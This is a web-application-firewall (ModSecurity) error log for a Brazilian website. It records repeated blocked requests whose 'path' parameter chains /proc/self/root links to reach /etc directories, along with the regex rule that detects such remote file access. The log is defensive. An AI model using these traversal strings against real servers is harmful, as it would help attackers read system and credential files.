https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:36:41.002876 2026] [:error] [pid 7437:tid 140411741927168] [client 74.7.243.203:44320] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk8yQeiSKl8TjouI-b7OgAAA8A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:36:44.759220 2026] [:error] [pid 7000:tid 140411557287680] [client 74.7.243.203:56940] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk8zBePVOt35XCGZP8o4AAAA5Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:37:18.459166 2026] [:error] [pid 7000:tid 140411741927168] [client 74.7.241.46:37828] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk87hePVOt35XCGZP8o_AAAA4A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:37:24.347207 2026] [:error] [pid 2325:tid 140411649607424] [client 74.7.241.46:41106] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk89O82sZHvlq4xgHq8hAAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:37:29.971055 2026] [:error] [pid 1961:tid 140411624429312] [client 74.7.241.46:41108] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk8-XRXaaWotPICgYseCAAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:37:32.941107 2026] [:error] [pid 2473:tid 140411725141760] [client 74.7.241.46:56908] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk8_KBJNF7axNlVR0X1wgAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:38:05.448429 2026] [:error] [pid 1961:tid 140411649607424] [client 74.7.228.16:45964] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abk9HXRXaaWotPICgYseGAAAA0s"]
[Tue Mar 17 08:38:26.024545 2026] [:error] [pid 2325:tid 140411641214720] [client 74.7.241.46:56924] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk9Mu82sZHvlq4xgHq8tQAAAow"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:38:39.671326 2026] [:error] [pid 11293:tid 140411649607424] [client 74.7.243.203:56946] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk9P9CmCSWTlPouqorFCQAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:38:39.859055 2026] [:error] [pid 7437:tid 140411607643904] [client 74.7.241.46:45408] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk9PweiSKl8TjouI-b7XgAAA9A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:38:49.148885 2026] [:error] [pid 1961:tid 140411691570944] [client 74.7.241.46:58198] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk9SXRXaaWotPICgYseMwAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 08:38:56.846683 2026] [:error] [pid 1210:tid 140411649607424] [client 74.7.241.46:46718] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk9UFKJy4A1bGlmj9BO8wAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:39:14.557572 2026] [:error] [pid 7437:tid 140411548894976] [client 74.7.243.203:38134] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk9YgeiSKl8TjouI-b7fwAAA9c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:40:31.523763 2026] [:error] [pid 1961:tid 140411699963648] [client 74.7.243.203:59260] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk9r3RXaaWotPICgYseigAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:41:07.275681 2026] [:error] [pid 2473:tid 140411649607424] [client 74.7.241.46:44772] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk90qBJNF7axNlVR0X1-gAAAAs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:41:08.602927 2026] [:error] [pid 1210:tid 140411674785536] [client 74.7.241.46:53758] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk91FKJy4A1bGlmj9BPMAAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:41:10.542395 2026] [:error] [pid 2305:tid 140411699963648] [client 74.7.241.46:53774] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk91QQohV2v-7oj5HH0YAAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:41:11.911657 2026] [:error] [pid 1961:tid 140411607643904] [client 74.7.241.46:53786] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk913RXaaWotPICgYsekgAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:41:14.040349 2026] [:error] [pid 7437:tid 140411658000128] [client 74.7.241.46:53788] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk92QeiSKl8TjouI-b7pAAAA8o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:41:58.602751 2026] [:error] [pid 11293:tid 140411632822016] [client 74.7.241.46:53796] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk-BtCmCSWTlPouqorFYwAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:42:28.512851 2026] [:error] [pid 7000:tid 140411599251200] [client 74.7.241.46:42342] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk-JBePVOt35XCGZP8psQAAA5E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 08:42:53.730843 2026] [:error] [pid 1961:tid 140411699963648] [client 74.7.243.203:53458] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk-PXRXaaWotPICgYsexgAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
